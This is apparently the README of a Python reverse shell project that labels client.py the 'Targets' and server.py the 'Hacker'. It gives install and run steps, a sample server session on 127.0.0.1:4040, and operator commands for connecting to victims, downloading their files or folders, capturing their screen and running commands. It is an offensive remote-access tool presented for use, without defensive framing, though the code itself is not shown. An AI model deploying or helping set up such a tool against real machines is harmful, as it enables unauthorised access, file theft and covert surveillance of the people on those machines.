Reverse shell project implemented with python and socket.
Targets: client.py
Hacker: server.py
- pillow
- termcolor
- tqdm
python -m pip install pillow termcolor tqdm
Run server.py
on your machine.
python server.py
[IP List] List of IP address
1 - ('127.0.0.1', 4040)
In which address would you like to run the server?
[IP Choice]:
Chose the your IP address where server will running and press Enter.
[Server start] at [127.0.0.1:4040] 📡
╭─ [127.0.0.1:4040][0 Clients]
╰─ ❯
Run client.py
and enter the IP address of the server.
python client.py
[Server IP]:
[Server IP]: 127.0.0.1
╭─ 127.0.0.1:4040[0 Clients]
╰─ ❯
# Show all clients connected with server.
clients show
# Select a client.
clients connect <client number>
# Disconnect a client.
clients disconnect <client number>
# Shut down the server.
exit
download <filename or foldername> <destination:optional>
capture <destination.png>
# Don't forget .png file extension.
os
clients
local <command>
exit
-
Use double quote (not single quote) when passing an argument containing space.
download "file name.txt" file.txt